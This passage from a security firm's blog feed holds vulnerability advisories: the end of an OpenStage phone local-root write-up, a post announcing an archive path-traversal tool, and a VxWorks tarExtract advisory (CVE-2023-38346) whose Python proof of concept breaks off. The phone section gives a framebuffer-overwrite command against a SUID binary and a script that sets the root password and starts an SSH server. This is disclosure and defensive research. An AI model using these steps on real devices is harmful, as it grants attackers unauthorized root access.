#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)&lt;/pre&gt;
&lt;p&gt;The attacker creates a file containing this payload, dumps it into the framebuffer and uses the &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt;. Because of its SUID bit, even files belonging to the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user and a privileged group can be overwritten.&lt;/p&gt;
&lt;pre class="literal-block"&gt;cat payload &amp;gt; /dev/fb0 ; /Opera_Deploy/appWeb/web/fbshot.exe /sbin/fw_printenv&lt;/pre&gt;
&lt;p&gt;The &lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt; file is now a BMP file which includes the payload. The program file's flags and ownership is preserved. The file still has the SetUID bit set. With the specific framebuffer content, the BMP is a valid script and will run &lt;code class="docutils literal"&gt;/home/admin/myscript&lt;/code&gt;. After a reboot the phone executes the &lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt; and in consequence &lt;code class="docutils literal"&gt;/home/admin/myscript&lt;/code&gt; as &lt;code class="docutils literal"&gt;root&lt;/code&gt;. In order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access the &lt;code class="docutils literal"&gt;myscript&lt;/code&gt; file can be defined as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;#!/bin/sh
/Opera_Deploy/setPasswd.sh root 123456
dropbear&lt;/pre&gt;
&lt;p&gt;Using a well-crafted payload and replacing the right files, an attacker might be able to gain &lt;code class="docutils literal"&gt;root&lt;/code&gt; access without a proxy &lt;code class="docutils literal"&gt;myscript&lt;/code&gt; file and without rebooting.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-4"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs code execution permission on the phone, for example via SSH access.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="proof-of-concept-exploit"&gt;
&lt;h2&gt;Proof of concept exploit&lt;/h2&gt;
&lt;p&gt;Pentagrid developed a proof of concept exploit, which is published on &lt;a class="reference external" href="https://github.com/pentagridsec/openstage-exploit-chain"&gt;Github&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="patches-and-workaround"&gt;
&lt;h2&gt;Patches and Workaround&lt;/h2&gt;
&lt;p&gt;Pentagrid recommends to update to a recent firmware version as documented in Unify's advisory &lt;a class="reference external" href="https://networks.unify.com/security/advisories/OBSO-2312-01.pdf"&gt;OBSO-2312-01&lt;/a&gt;. Furthermore, it is necessary to enable the so-called "secure mode", which activates certificate verification. Just activating all possible certificate checks via the web-based management does not activate the secure mode. It requires to set up a DLS, install a certificate authority, deploy certificates to phones and then to enable the secure mode.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;These vulnerabilities have been found by Michael Oelke and Martin Schobert (Pentagrid).&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>API</category><category>Certificate Verification</category><category>Exploit</category><category>OpenScape</category><category>OpenStage</category><category>Unify</category><category>VoIP</category><category>Vulnerability</category><guid>https://www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/</guid><pubDate>Fri, 08 Dec 2023 05:42:00 GMT</pubDate></item><item><title>Archive Pwn tool released</title><link>https://www.pentagrid.ch/en/blog/archive-pwn-tool-release/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;When extracting archive formats there are many things that can go wrong. While some unarchiving tools and libraries protect from malicious archives that include path traversal attacks, other might not or at least not in the default configuration. We wrote a tool to create such archives with path traversal attacks in Python.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;Recently we've come across different web applications and embedded devices that allow archive formats such as zips, tars and cpio archives as user input. Therefore, it is always important to check if they are affected by path traversal attacks. If you don't know what we're talking about you might want to read about the &lt;a class="reference external" href="https://github.com/snyk/zip-slip-vulnerability"&gt;zip slip vulnerability&lt;/a&gt; or read our explanations in our &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/"&gt;Wind River VxWorks tarExtract directory traversal vulnerability (CVE-2023-38346)&lt;/a&gt; advisory.&lt;/p&gt;
&lt;p&gt;While there have been tools such as &lt;a class="reference external" href="https://github.com/0xless/slip"&gt;slip&lt;/a&gt; and &lt;a class="reference external" href="https://github.com/jwilk/traversal-archives"&gt;traversal-archives&lt;/a&gt;, we had some special use cases. Both tools and our new &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn&lt;/a&gt; tool slightly vary in supported archive formats (zip, tar and cpio here), file formats (tar ustar, gnu tar, cpio newc, etc.) and implemented attacks (simple path traversal, symlink attacks, etc.).&lt;/p&gt;
&lt;p&gt;We encountered more complicated parsing routines that required us to create custom archives that already include a certain file structure. The analysed code sometimes unpacked a single file from the archive first and an error was thrown if the file was not present. However, the vulnerable code that would allow us to do a path traversal attack was later in the code. Therefore, we created &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn&lt;/a&gt; that packs an entire folder into the archive before adding the attack payload entry.&lt;/p&gt;
&lt;p&gt;Most of the ideas came from looking at old vulnerabilities and specifications or the file formats in a hex editor and then implementing attacks such as maximum Windows path length attacks, unicode normalisation, DoS via very deep directories, including a path traversal in the filename included in .gz files, etc.&lt;/p&gt;
&lt;p&gt;Creating a tool that generates as many combinations of attacks as possible was as well important, so the output of the tool can serve as a test collection for unarchiving tools. You can unpack all archives the tool creates and check if you can find a file in a different directory than the unpacking location.&lt;/p&gt;
&lt;p&gt;We've also decided to make sure that we copy the tar and zip libraries from Python and slightly modify them, allowing us to implement further non-standard conform attacks in the future. There's an example in the README on the &lt;a class="reference external" href="https://github.com/pentagridsec/archive_pwn"&gt;Archive Pwn Github page&lt;/a&gt; on how to create your own malicious archives.&lt;/p&gt;
&lt;p&gt;The tool release is related to the recent advisories we released for &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/"&gt;Busybox cpio directory traversal vulnerability (CVE-2023-39810)&lt;/a&gt; and &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/"&gt;Wind River VxWorks tarExtract directory traversal vulnerability (CVE-2023-38346)&lt;/a&gt;, where especially the VxWorks blog post deep-dives into some of the archive vulnerabilities.&lt;/p&gt;</description><category>Directory Traversal</category><category>Exploit</category><category>Pentesting</category><category>Python</category><category>Tools</category><guid>https://www.pentagrid.ch/en/blog/archive-pwn-tool-release/</guid><pubDate>Tue, 03 Oct 2023 15:42:00 GMT</pubDate></item><item><title>Wind River VxWorks tarExtract directory traversal vulnerability (CVE-2023-38346)</title><link>https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/202309_river.png"&gt;&lt;/figure&gt; &lt;p&gt;Today we publish an advisory for a specific function in &lt;a class="reference external" href="https://www.windriver.com/products/vxworks"&gt;Wind River's VxWorks operating system&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;VxWorks is a real-time operating system used in many embedded devices in high-availability environments with high safety and security requirements. This includes important industrial, medical, airospace, networking and automotive devices. For example, &lt;a class="reference external" href="https://mars.nasa.gov/msl/home/"&gt;NASA's Curiosity rover&lt;/a&gt; currently deployed on planet Mars is using Wind River's VxWorks operating system.&lt;/p&gt;
&lt;p&gt;The vulnerability is triggered when VxWorks' &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; function is used on untrusted tar archive files. The &lt;a class="reference external" href="https://support2.windriver.com/index.php?page=cve&amp;amp;on=view&amp;amp;id=CVE-2023-38346"&gt;official VxWorks advisory can be found on the Wind River website&lt;/a&gt;.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;Pentagrid identified a vulnerability in VxWorks' &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; method affecting at least VxWorks 21.07. The function &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; implements tar file extraction and thereby also processes files within an archive that has relative or absolute file names. While end-user tar tools on other platforms usually stop processing an archive if not otherwise forced, the VxWorks' &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; proceeds with processing relative or absolute filenames. This is unexpected and also undocumented behaviour, which in general may result in a directory traversal vulnerability.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;If a developer uses &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; without additional checks, extracting an untrusted tar file may lead to an overwrite of files outside the current working directory in the filesystem of the VxWorks operating system. If the tar processing runs under elevated privileges, &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; may overwrite arbitrary files in a VxWorks environment, which may then lead to a system compromise. In an embedded environment, extracting tar files likely happens during multi-file imports such as data ingestion or software/configuration update. The directory traversal may lead to a verification bypass, if a tar archive is extracted first and the verification of the content happens afterwards.&lt;/p&gt;
&lt;p&gt;We rate the issue as a high-severity issue for devices that use the &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; function on untrusted user input.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2023-06-05: Vulnerability noticed and research into tar behaviour started.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-21: Initial contact request as requested by &lt;a class="reference external" href="https://www.windriver.com/psirt-policy"&gt;Wind River's PSIRT&lt;/a&gt; and encrypted with the published PGP key. Communication of coordinated disclosure publication date 2023-09-19.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-21: Wind River PSIRT replies they can't decrypt the message and asks if we exchanged keys before. Pentagrid replied in a cleartext e-mail that we used the key from &lt;a class="reference external" href="https://www.windriver.com/psirt-policy"&gt;Wind River's PSIRT website&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-21: Pentagrid asks in a cleartext e-mail if they were able to decrypt the message now. No response from Wind River.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-28: Pentagrid asks in a cleartext e-mail for a status. Pentagrid informs Wind River that if we don't receive a response, we might publish information and will contact local authorities for communication support.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-28: Wind River is not able to decrypt the message. Wind River proposes to provide Pentagrid's keys in a password protected document and provide the password in a separate document. Alternatively, to send the e-mail unencrypted. Pentagrid resends advisory in an unencrypted e-mail to PSIRT lead. PSIRT lead commits to a monthly status update. Further e-mails only sent to PSIRT lead in cleartext.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-06-29: Wind River asks for flexibility on the disclosure deadline. An hour later Wind River asks to ignore the request.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-07-15: CVE-2023-38346 was assigned by MITRE.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-07-17: Status update by Wind River: Analysis ongoing.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-07-17: Wind River asks for a meeting.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-07-31: Video call between Pentagrid and Wind River. Wind River rates the vulnerability with a CVSS 3.1 score of 6.5 (Medium). Target version for a fix is 23.09. They are working on updating the documentation and introduce a secure default behavior of tarExtract. A communication plan for customers before coordinated disclosure date is in place.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-28: Video call between Pentagrid and Wind River, status update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-09-13: Video call between Pentagrid and Wind River, status update.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-09-19: Coordinated disclosure, Wind River publishes &lt;a class="reference external" href="https://support2.windriver.com/index.php?page=cve&amp;amp;on=view&amp;amp;id=CVE-2023-38346"&gt;their adisory&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;The issue affects VxWorks' &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; method affecting in at least VxWorks 21.07. Pentagrid assumes that all VxWorks versions released before September 2023 are affected.&lt;/p&gt;
&lt;p&gt;It is unknown to Pentagrid which or how many embedded devices implement a data ingestion or software/configuration update function by parsing untrusted archives with &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt;. It is likely that many devices are affected, as there seems to be no other data ingestion functionality available in the VxWorks Kernel API.&lt;/p&gt;
&lt;p&gt;CVE-2023-38346 has been assigned to this issue. The &lt;a class="reference external" href="https://support2.windriver.com/index.php?page=cve&amp;amp;on=view&amp;amp;id=CVE-2023-38346"&gt;official VxWorks advisory can be found on the Wind River website&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="background-information"&gt;
&lt;h2&gt;Background information&lt;/h2&gt;
&lt;p&gt;This finding is about different expectations and assumptions when using a tar extraction function. If there is a mismatch regarding the expectations and the actual behaviour, this might lead to a security issue.&lt;/p&gt;
&lt;p&gt;First of all, the standard tar utilities present in Linux, FreeBSD and also Busybox will not extract a file from an archive, if the file has an absolute file name or a relative file name outside the unpacking directory. Instead, these tools show a warning. For GNU and BSD tar, the option &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;--absolute-names&lt;/span&gt;&lt;/code&gt; (&lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;-P&lt;/span&gt;&lt;/code&gt;) must be added to force extraction of such files. For example, one may expect that extracting an archive in the download folder hopefully does not overwrite a user's &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;~/.bashrc&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Furthermore, if an archive is extracted from the root directory (&lt;code class="docutils literal"&gt;/&lt;/code&gt;), all path names are relative to the root directory. Files and directories may already exist and there is no need to use the pattern &lt;code class="docutils literal"&gt;../&lt;/code&gt; to traverse through the filesystem. Usually, software developers expect this behaviour when applications are installed. This should be known by every software developer and can be considered expected behaviour. However, absolute paths and directory traversal paths are not expected behaviour for many software developers as the following security issues illustrate.&lt;/p&gt;
&lt;p&gt;There were several vulnerabilities in the past regarding relative file names in tar files, for example:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://github.com/isaacs/node-tar/security/advisories/GHSA-5955-9wpr-37jh"&gt;node-tar - Fast and full-featured Tar for Node.js: Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization (CVE-2021-37713)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://github.com/isaacs/node-tar/security/advisories/GHSA-qq89-hq3f-393p"&gt;node-tar - Fast and full-featured Tar for Node.js: Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links (CVE-2021-37712)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://github.com/isaacs/node-tar/security/advisories/GHSA-9r2w-394v-53qc"&gt;node-tar - Fast and full-featured Tar for Node.js: Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links (CVE-2021-37701)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://github.com/isaacs/node-tar/security/advisories/GHSA-r628-mhmh-qjhw"&gt;node-tar - Fast and full-featured Tar for Node.js: Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning (CVE-2021-32803)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://github.com/isaacs/node-tar/security/advisories/GHSA-3jfq-g458-7qm9"&gt;node-tar - Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization (CVE-2021-32804),&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://www.sonarsource.com/blog/bitbucket-path-traversal-to-rce/"&gt;Bitbucket 6.1.1 Path Traversal to RCE (CVE-2019-3397)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://www.randori.com/blog/cve-2021-21972-vsphere-vulnerability-analysis/"&gt;VMware vCenter Server, vSphere Client - Remote code execution (CVE-2021-21972)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://security.snyk.io/research/zip-slip-vulnerability"&gt;A vulnerability called Zip Slip affects many libraries (including CVE-2018-1002203, CVE-2018-1002204, CVE-2018-1002200, CVE-2018-1002201, CVE-2018-1002202, CVE-2018-1002205, CVE-2018-1002206, CVE-2019-10743, CVE-2018-1002208, CVE-2018-1000544, CVE-2018-1002209, CVE-2018-10860)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://www.rapid7.com/blog/post/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/"&gt;The collaboration software Zimbra had a remotely exploitable vulnerability (CVE-2022-41352) originating in the use of Amavis that extracts tar files using the cpio tool.&lt;/a&gt; The problem with &lt;a class="reference external" href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669"&gt;GNU cpio is known for years as CVE-2015-1197 and also partially patched&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://nvd.nist.gov/vuln/detail/CVE-2007-4559"&gt;Python tarfile (CVE-2007-4559)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The last example of Python's tarfile got a CVE-ID assigned, but is still unfixed. Many discussions about this issue can be found on the Internet. At least &lt;a class="reference external" href="https://docs.python.org/3.11/library/tarfile.html#tarfile.TarFile.extractall"&gt;Python's API documentation highlights a prominent warning&lt;/a&gt;. But despite this warning, it seems to violate the principle of least astonishment: &lt;a class="reference external" href="https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html"&gt;A researcher from Trellix rediscovered this issue&lt;/a&gt;, wrote a tool for automated code-analysis and &lt;a class="reference external" href="https://www.trellix.com/en-us/about/newsroom/stories/research/open-source-intelligence.html"&gt;estimated that there may be 340,000 repositories at Github vulnerable to the tarfile problem&lt;/a&gt; and this despite a documented warning. The Bitbucket and VMware vulnerabilities mentioned above are both based on the &lt;a class="reference external" href="https://commons.apache.orgZimbra/proper/commons-compress/apidocs/overview-summary.html"&gt;tar extractor implementation org.apache.commons.compress.archivers.tar from the Apache Commons Compress library&lt;/a&gt;. This library does not have a prominent warning and obviously expectations on who must take care of what failed there, too.&lt;/p&gt;
&lt;p&gt;Bitbucket (CVE-2019-3397), Zimbra (CVE-2022-41352), vCenter (CVE-2021-21972) have CVSS Base Score beyond 9.0, implicating a critical severity. The last two vulnerabilities were added to CISA's &lt;a class="reference external" href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"&gt;Known Exploited Vulnerabilities Catalog&lt;/a&gt;. That means there is a good reason, why even a documented but unexpected behaviour becomes a problem, especially in security-critical environments.&lt;/p&gt;
&lt;p&gt;While the above list is about tar archives, the same problem exists for many archive formats, for example:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://security.snyk.io/research/zip-slip-vulnerability"&gt;Zip Slip&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/"&gt;Busybox cpio directory traversal vulnerability (CVE-2023-39810)&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h2&gt;Technical Details&lt;/h2&gt;
&lt;p&gt;Extracting untrusted user-supplied tar files in an embedded device is part of a user-friendly way to implement a multi-file import such as data ingestion or software/configuration update. The device allows tar import instead of multiple files, to simplify the process for the user. At the same time, overwriting or adding an attacker-supplied file to a file system might lead to direct remote command execution vulnerability (e.g. by overwriting an application binary that includes executable code). Therefore, many implementations of software/configuration update functions in commercial products verify the supplied files (e.g. by using cryptographic signatures). But these signatures have to be stored somewhere and therefore are usually included in the tar file. As tar file extraction therefore has to happen in a first step (to extract the cryptographic signature and the update files) and before any content is verified, the current behaviour of &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; allows to bypass such verification steps as well.&lt;/p&gt;
&lt;p&gt;Documentation and source code at least for VxWorks 5.5 and 6.6 does not mention required steps to process a tar file in order to prevent vulnerabilities. It does not include warnings for the &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; function and that it shouldn't be applied to untrusted tar files. It also does not include a guide on how a multi-file import, such as data ingestion or software/configuration update via a single archive file (zip, tar, etc.), could be securely implemented. Tar is the only archive format currently supported according to the VxWorks Kernel API documentation.&lt;/p&gt;
&lt;p&gt;Therefore, Pentagrid assumes that many current implementations of data ingestion or software/configuration update functions in devices with VxWorks have this vulnerability.&lt;/p&gt;
&lt;p&gt;As privilege separation via different users in VxWorks was only recently introduced, it is possible that current implementations do not already use this feature. Therefore, it is possible that data ingestion or software/configuration update functions do not protect themself by using different users and access permissions on the operating system level.&lt;/p&gt;
&lt;p&gt;As VxWorks &lt;code class="docutils literal"&gt;tarToc&lt;/code&gt; function only prints to standard output, software developers would need to write custom parsers to check that the tar contents are safe to unpack. This introduces undesired complexity and dependency on the &lt;code class="docutils literal"&gt;tarToc&lt;/code&gt; output format not changing between VxWorks versions.&lt;/p&gt;
&lt;p&gt;Exploitation of the &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; issue can be achieved by supplying a crafted tar file. For creating such a tar file, Pentagrid used a simple script based on the Python version 3 tarfile library, which is flexible regarding the handling of relative file names as mentioned earlier. The used script is shown below:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code python"&gt;&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-1" name="rest_code_618f623a668d4805abe0dcddcf478585-1" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-1"&gt;&lt;/a&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-2" name="rest_code_618f623a668d4805abe0dcddcf478585-2" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-2"&gt;&lt;/a&gt;&lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-3" name="rest_code_618f623a668d4805abe0dcddcf478585-3" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-3"&gt;&lt;/a&gt;&lt;span class="c1"&gt;# The author of this code is not responsible for any damage caused by the use&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-4" name="rest_code_618f623a668d4805abe0dcddcf478585-4" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-4"&gt;&lt;/a&gt;&lt;span class="c1"&gt;# or misuse of this PoC exploit. This PoCs is intended for educational and&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-5" name="rest_code_618f623a668d4805abe0dcddcf478585-5" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-5"&gt;&lt;/a&gt;&lt;span class="c1"&gt;# research purposes only, and should never be used to target or exploit systems&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-6" name="rest_code_618f623a668d4805abe0dcddcf478585-6" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-6"&gt;&lt;/a&gt;&lt;span class="c1"&gt;# without explicit permission from the owner.&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-7" name="rest_code_618f623a668d4805abe0dcddcf478585-7" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-7"&gt;&lt;/a&gt;&lt;span class="c1"&gt;#&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-8" name="rest_code_618f623a668d4805abe0dcddcf478585-8" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-8"&gt;&lt;/a&gt;&lt;span class="kn"&gt;import&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;tarfile&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-9" name="rest_code_618f623a668d4805abe0dcddcf478585-9" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-9"&gt;&lt;/a&gt;&lt;span class="kn"&gt;import&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;os&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-10" name="rest_code_618f623a668d4805abe0dcddcf478585-10" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-10"&gt;&lt;/a&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"emptyfile"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"wb"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-11" name="rest_code_618f623a668d4805abe0dcddcf478585-11" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-11"&gt;&lt;/a&gt;    &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s2"&gt;"Just a test"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
